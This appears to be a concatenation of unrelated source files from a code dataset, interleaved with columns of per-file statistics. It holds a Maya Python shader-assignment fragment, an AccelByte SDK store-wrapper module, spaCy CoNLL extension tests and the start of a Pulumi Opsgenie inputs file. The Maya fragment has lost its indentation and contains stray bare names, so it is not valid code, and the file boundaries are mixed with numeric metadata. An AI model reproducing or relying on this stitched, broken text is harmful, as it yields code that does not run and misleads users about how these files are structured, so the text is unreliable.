for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
else:
cmds.warning('Please select your file(s) and a shader.')
while counter < number_of_shaders:
delete_shader(shaders_list[counter], shaders_color_list[counter])
counter = counter + 1
arnold_final_shaders = cmds.ls(type = arnold)
blinn_final_shaders = cmds.ls(type = blinn)
phong_final_shaders = cmds.ls(type = phong)
redshift_final_shaders = cmds.ls(type = redshift)
lambert_final_shaders = cmds.ls(type = lambert)
object_suf_len = len(object_suffix)
object_names = cmds.ls(type = 'transform')
shader_arnold_len = len(arnold_final_shaders)
shader_blinn_len = len(blinn_final_shaders)
shader_phong_len = len(phong_final_shaders)
shader_redshift_len = len(redshift_final_shaders)
shader_lambert_len = len(lambert_final_shaders)
var = 0
if object_material_connect == True:
if default_shader == arnold:
while var < shader_arnold_len:
for b in object_names:
c = b.partition(object_suffix)[0]
# get materails names and its shader to sets
if c in arnold_final_shaders[var]:
#find out for b and use that instead
test = cmds.listConnections((arnold_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == blinn:
while var < shader_blinn_len:
for b in object_names:
c = b.partition(object_suffix)[0]
# get materails names and its shader to sets
if c in blinn_final_shaders[var]:
#find out for b and use that instead
test = cmds.listConnections((blinn_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == phong:
while var < shader_phong_len:
for b in object_names:
c = b.partition(object_suffix)[0]
# get materails names and its shader to sets
if c in phong_final_shaders[var]:
#find out for b and use that instead
test = cmds.listConnections((phong_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == redshift:
while var < shader_redshift_len:
for b in object_names:
c = b.partition(object_suffix)[0]
# get materails names and its shader to sets
if c in redshift_final_shaders[var]:
#find out for b and use that instead
test = cmds.listConnections((redshift_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == lambert:
while var < shader_lambert_len:
for b in object_names:
c = b.partition(object_suffix)[0]
# get materails names and its shader to sets
if c in lambert_final_shaders[var]:
#find out for b and use that instead
test = cmds.listConnections((lambert_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
| 54.511196
| 152
| 0.416151
| 16,428
| 199,620
| 4.809593
| 0.025931
| 0.042728
| 0.046069
| 0.016036
| 0.921328
| 0.906622
| 0.901218
| 0.897408
| 0.893611
| 0.888941
| 0
| 0.020452
| 0.517473
| 199,620
| 3,661
| 153
| 54.526086
| 0.799838
| 0.014818
| 0
| 0.926656
| 0
| 0.000308
| 0.059178
| 0.001463
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012327
| false
| 0.007088
| 0.001233
| 0
| 0.013559
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d681b180707b5c199da20928e46278c39d5f325f
| 14,438
|
py
|
Python
|
accelbyte_py_sdk/api/platform/wrappers/_store.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/api/platform/wrappers/_store.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
accelbyte_py_sdk/api/platform/wrappers/_store.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import HeaderStr
from ....core import get_namespace as get_services_namespace
from ....core import run_request
from ....core import run_request_async
from ....core import same_doc_as
from ..models import ErrorEntity
from ..models import StoreBackupInfo
from ..models import StoreCreate
from ..models import StoreInfo
from ..models import StoreUpdate
from ..models import ValidationErrorEntity
from ..operations.store import CloneStore
from ..operations.store import CreateStore
from ..operations.store import DeletePublishedStore
from ..operations.store import DeleteStore
from ..operations.store import ExportStore
from ..operations.store import GetPublishedStore
from ..operations.store import GetPublishedStoreBackup
from ..operations.store import GetStore
from ..operations.store import ImportStore
from ..operations.store import ListStores
from ..operations.store import PublicListStores
from ..operations.store import RollbackPublishedStore
from ..operations.store import UpdateStore
@same_doc_as(CloneStore)
def clone_store(store_id: str, target_store_id: Optional[str] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build a CloneStore request and execute it synchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return run_request(
        CloneStore.create(store_id=store_id, target_store_id=target_store_id, namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(CloneStore)
async def clone_store_async(store_id: str, target_store_id: Optional[str] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build a CloneStore request and execute it asynchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return await run_request_async(
        CloneStore.create(store_id=store_id, target_store_id=target_store_id, namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(CreateStore)
def create_store(body: Optional[StoreCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build a CreateStore request and execute it synchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return run_request(
        CreateStore.create(body=body, namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(CreateStore)
async def create_store_async(body: Optional[StoreCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build a CreateStore request and execute it asynchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return await run_request_async(
        CreateStore.create(body=body, namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(DeletePublishedStore)
def delete_published_store(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build a DeletePublishedStore request and execute it synchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return run_request(
        DeletePublishedStore.create(namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(DeletePublishedStore)
async def delete_published_store_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build a DeletePublishedStore request and execute it asynchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return await run_request_async(
        DeletePublishedStore.create(namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(DeleteStore)
def delete_store(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build a DeleteStore request and execute it synchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return run_request(
        DeleteStore.create(store_id=store_id, namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(DeleteStore)
async def delete_store_async(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build a DeleteStore request and execute it asynchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return await run_request_async(
        DeleteStore.create(store_id=store_id, namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(ExportStore)
def export_store(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build an ExportStore request and execute it synchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return run_request(
        ExportStore.create(store_id=store_id, namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(ExportStore)
async def export_store_async(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build an ExportStore request and execute it asynchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return await run_request_async(
        ExportStore.create(store_id=store_id, namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(GetPublishedStore)
def get_published_store(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build a GetPublishedStore request and execute it synchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return run_request(
        GetPublishedStore.create(namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(GetPublishedStore)
async def get_published_store_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Build a GetPublishedStore request and execute it asynchronously.

    When *namespace* is omitted it is resolved from the SDK configuration;
    a resolution failure short-circuits to ``(None, error)``.
    """
    if namespace is None:
        namespace, ns_error = get_services_namespace()
        if ns_error:
            return None, ns_error
    return await run_request_async(
        GetPublishedStore.create(namespace=namespace),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(GetPublishedStoreBackup)
def get_published_store_backup(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Fetch the published store's backup (sync).

    Falls back to the SDK-configured services namespace when *namespace*
    is not supplied; returns ``(None, error)`` if that lookup fails.
    """
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return run_request(
        GetPublishedStoreBackup.create(namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(GetPublishedStoreBackup)
async def get_published_store_backup_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Fetch the published store's backup (async counterpart of :func:`get_published_store_backup`)."""
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return await run_request_async(
        GetPublishedStoreBackup.create(namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(GetStore)
def get_store(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Fetch a single store by its ID (sync).

    Falls back to the SDK-configured services namespace when *namespace*
    is not supplied; returns ``(None, error)`` if that lookup fails.
    """
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return run_request(
        GetStore.create(store_id=store_id, namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(GetStore)
async def get_store_async(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Fetch a single store by its ID (async counterpart of :func:`get_store`)."""
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return await run_request_async(
        GetStore.create(store_id=store_id, namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(ImportStore)
def import_store(file: Optional[Any] = None, store_id: Optional[str] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Import a store from an uploaded file (sync).

    Falls back to the SDK-configured services namespace when *namespace*
    is not supplied; returns ``(None, error)`` if that lookup fails.
    """
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return run_request(
        ImportStore.create(file=file, store_id=store_id, namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(ImportStore)
async def import_store_async(file: Optional[Any] = None, store_id: Optional[str] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Import a store from an uploaded file (async counterpart of :func:`import_store`)."""
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return await run_request_async(
        ImportStore.create(file=file, store_id=store_id, namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(ListStores)
def list_stores(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """List all stores in a namespace (sync).

    Falls back to the SDK-configured services namespace when *namespace*
    is not supplied; returns ``(None, error)`` if that lookup fails.
    """
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return run_request(
        ListStores.create(namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(ListStores)
async def list_stores_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """List all stores in a namespace (async counterpart of :func:`list_stores`)."""
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return await run_request_async(
        ListStores.create(namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(PublicListStores)
def public_list_stores(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """List stores via the public endpoint (sync).

    Falls back to the SDK-configured services namespace when *namespace*
    is not supplied; returns ``(None, error)`` if that lookup fails.
    """
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return run_request(
        PublicListStores.create(namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(PublicListStores)
async def public_list_stores_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """List stores via the public endpoint (async counterpart of :func:`public_list_stores`)."""
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return await run_request_async(
        PublicListStores.create(namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(RollbackPublishedStore)
def rollback_published_store(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Roll the published store back to its backup (sync).

    Falls back to the SDK-configured services namespace when *namespace*
    is not supplied; returns ``(None, error)`` if that lookup fails.
    """
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return run_request(
        RollbackPublishedStore.create(namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(RollbackPublishedStore)
async def rollback_published_store_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Roll the published store back to its backup (async counterpart of :func:`rollback_published_store`)."""
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return await run_request_async(
        RollbackPublishedStore.create(namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(UpdateStore)
def update_store(store_id: str, body: Optional[StoreUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Update a store identified by *store_id* with the given *body* (sync).

    Falls back to the SDK-configured services namespace when *namespace*
    is not supplied; returns ``(None, error)`` if that lookup fails.
    """
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return run_request(
        UpdateStore.create(store_id=store_id, body=body, namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
@same_doc_as(UpdateStore)
async def update_store_async(store_id: str, body: Optional[StoreUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    """Update a store identified by *store_id* (async counterpart of :func:`update_store`)."""
    ns = namespace
    if ns is None:
        ns, error = get_services_namespace()
        if error:
            return None, error
    return await run_request_async(
        UpdateStore.create(store_id=store_id, body=body, namespace=ns),
        additional_headers=x_additional_headers,
        **kwargs,
    )
| 37.598958
| 187
| 0.716858
| 1,722
| 14,438
| 5.785714
| 0.069106
| 0.133092
| 0.093948
| 0.062632
| 0.832079
| 0.818428
| 0.818428
| 0.818428
| 0.808993
| 0.808993
| 0
| 0.000342
| 0.190331
| 14,438
| 383
| 188
| 37.697128
| 0.851925
| 0.053054
| 0
| 0.747541
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042623
| false
| 0
| 0.101639
| 0
| 0.314754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ba6317cb30c60ef5c0bdfa9d2a26ee0cc14ff068
| 4,171
|
py
|
Python
|
spacy_conll/tests/test_spacy_stanfordnlp_has_extension.py
|
KoichiYasuoka/spacy_conll
|
b9791a2cdbddde060fac494a6d6b2bd0042496ad
|
[
"BSD-2-Clause"
] | null | null | null |
spacy_conll/tests/test_spacy_stanfordnlp_has_extension.py
|
KoichiYasuoka/spacy_conll
|
b9791a2cdbddde060fac494a6d6b2bd0042496ad
|
[
"BSD-2-Clause"
] | null | null | null |
spacy_conll/tests/test_spacy_stanfordnlp_has_extension.py
|
KoichiYasuoka/spacy_conll
|
b9791a2cdbddde060fac494a6d6b2bd0042496ad
|
[
"BSD-2-Clause"
] | null | null | null |
# Doc: single sentence
def test_doc_has_conll_str_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
    """A parsed single-sentence Doc exposes a string `conll_str` extension."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
    assert parsed.has_extension('conll_str')
    value = parsed._.conll_str
    assert value is not None
    assert isinstance(value, str)
def test_doc_has_conll_str_headers_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
    """A parsed single-sentence Doc exposes a string `conll_str_headers` extension."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
    assert parsed.has_extension('conll_str_headers')
    value = parsed._.conll_str_headers
    assert value is not None
    assert isinstance(value, str)
def test_doc_has_conll_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
    """A parsed single-sentence Doc exposes a list `conll` extension."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
    assert parsed.has_extension('conll')
    value = parsed._.conll
    assert value is not None
    assert isinstance(value, list)
# Doc: multi-sentence
def test_doc_has_conll_str_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
    """A parsed multi-sentence Doc exposes a string `conll_str` extension."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
    assert parsed.has_extension('conll_str')
    value = parsed._.conll_str
    assert value is not None
    assert isinstance(value, str)
def test_doc_has_conll_str_headers_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
    """A parsed multi-sentence Doc exposes a string `conll_str_headers` extension."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
    assert parsed.has_extension('conll_str_headers')
    value = parsed._.conll_str_headers
    assert value is not None
    assert isinstance(value, str)
def test_doc_has_conll_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
    """A parsed multi-sentence Doc exposes a list `conll` extension."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
    assert parsed.has_extension('conll')
    value = parsed._.conll
    assert value is not None
    assert isinstance(value, list)
# Sents
def test_sents_has_conll_str_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
    """Every sentence span of a single-sentence Doc carries a string `conll_str`."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
    for sentence in parsed.sents:
        assert sentence.has_extension('conll_str')
        value = sentence._.conll_str
        assert value is not None
        assert isinstance(value, str)
def test_sents_has_conll_str_headers_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
    """Every sentence span of a single-sentence Doc carries a string `conll_str_headers`."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
    for sentence in parsed.sents:
        assert sentence.has_extension('conll_str_headers')
        value = sentence._.conll_str_headers
        assert value is not None
        assert isinstance(value, str)
def test_sents_has_conll_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
    """Every sentence span of a single-sentence Doc carries a list `conll`."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
    for sentence in parsed.sents:
        assert sentence.has_extension('conll')
        value = sentence._.conll
        assert value is not None
        assert isinstance(value, list)
# Sents: multi-sentence
def test_sents_has_conll_str_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
    """Every sentence span of a multi-sentence Doc carries a string `conll_str`."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
    for sentence in parsed.sents:
        assert sentence.has_extension('conll_str')
        value = sentence._.conll_str
        assert value is not None
        assert isinstance(value, str)
def test_sents_has_conll_str_headers_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
    """Every sentence span of a multi-sentence Doc carries a string `conll_str_headers`."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
    for sentence in parsed.sents:
        assert sentence.has_extension('conll_str_headers')
        value = sentence._.conll_str_headers
        assert value is not None
        assert isinstance(value, str)
def test_sents_has_conll_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
    """Every sentence span of a multi-sentence Doc carries a list `conll`."""
    parsed = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
    for sentence in parsed.sents:
        assert sentence.has_extension('conll')
        value = sentence._.conll
        assert value is not None
        assert isinstance(value, list)
| 50.253012
| 121
| 0.813714
| 592
| 4,171
| 5.206081
| 0.045608
| 0.083063
| 0.140169
| 0.171317
| 0.987021
| 0.987021
| 0.979234
| 0.967554
| 0.967554
| 0.967554
| 0
| 0
| 0.126588
| 4,171
| 82
| 122
| 50.865854
| 0.846006
| 0.016303
| 0
| 0.818182
| 0
| 0
| 0.030259
| 0
| 0
| 0
| 0
| 0
| 0.545455
| 1
| 0.181818
| false
| 0
| 0
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
bac541d4a0291cfe28ce97ab146bb84b50abe5d4
| 166,815
|
py
|
Python
|
sdk/python/pulumi_opsgenie/_inputs.py
|
pulumi/pulumi-opsgenie
|
4bc7d0cbb5b0437c59422a5977a61468baa2c4a7
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-12-01T20:57:42.000Z
|
2021-12-01T20:57:42.000Z
|
sdk/python/pulumi_opsgenie/_inputs.py
|
pulumi/pulumi-opsgenie
|
4bc7d0cbb5b0437c59422a5977a61468baa2c4a7
|
[
"ECL-2.0",
"Apache-2.0"
] | 34
|
2021-02-03T20:15:32.000Z
|
2022-03-25T19:57:20.000Z
|
sdk/python/pulumi_opsgenie/_inputs.py
|
pulumi/pulumi-opsgenie
|
4bc7d0cbb5b0437c59422a5977a61468baa2c4a7
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-07-08T15:16:09.000Z
|
2021-07-20T11:12:44.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'AlertPolicyFilterArgs',
'AlertPolicyFilterConditionArgs',
'AlertPolicyResponderArgs',
'AlertPolicyTimeRestrictionArgs',
'AlertPolicyTimeRestrictionRestrictionArgs',
'ApiIntegrationResponderArgs',
'EmailIntegrationResponderArgs',
'EscalationRepeatArgs',
'EscalationRuleArgs',
'EscalationRuleRecipientArgs',
'IncidentTemplateStakeholderPropertyArgs',
'IntegrationActionAcknowledgeArgs',
'IntegrationActionAcknowledgeFilterArgs',
'IntegrationActionAcknowledgeFilterConditionArgs',
'IntegrationActionAddNoteArgs',
'IntegrationActionAddNoteFilterArgs',
'IntegrationActionAddNoteFilterConditionArgs',
'IntegrationActionCloseArgs',
'IntegrationActionCloseFilterArgs',
'IntegrationActionCloseFilterConditionArgs',
'IntegrationActionCreateArgs',
'IntegrationActionCreateFilterArgs',
'IntegrationActionCreateFilterConditionArgs',
'IntegrationActionCreateResponderArgs',
'IntegrationActionIgnoreArgs',
'IntegrationActionIgnoreFilterArgs',
'IntegrationActionIgnoreFilterConditionArgs',
'MaintenanceRuleArgs',
'MaintenanceRuleEntityArgs',
'MaintenanceTimeArgs',
'NotificationPolicyAutoCloseActionArgs',
'NotificationPolicyAutoCloseActionDurationArgs',
'NotificationPolicyAutoRestartActionArgs',
'NotificationPolicyAutoRestartActionDurationArgs',
'NotificationPolicyDeDuplicationActionArgs',
'NotificationPolicyDeDuplicationActionDurationArgs',
'NotificationPolicyDelayActionArgs',
'NotificationPolicyDelayActionDurationArgs',
'NotificationPolicyFilterArgs',
'NotificationPolicyFilterConditionArgs',
'NotificationPolicyTimeRestrictionArgs',
'NotificationPolicyTimeRestrictionRestrictionArgs',
'NotificationRuleCriteriaArgs',
'NotificationRuleCriteriaConditionArgs',
'NotificationRuleRepeatArgs',
'NotificationRuleScheduleArgs',
'NotificationRuleStepArgs',
'NotificationRuleStepContactArgs',
'NotificationRuleTimeRestrictionArgs',
'NotificationRuleTimeRestrictionRestrictionArgs',
'ScheduleRotationParticipantArgs',
'ScheduleRotationTimeRestrictionArgs',
'ScheduleRotationTimeRestrictionRestrictionArgs',
'ServiceIncidentRuleIncidentRuleArgs',
'ServiceIncidentRuleIncidentRuleConditionArgs',
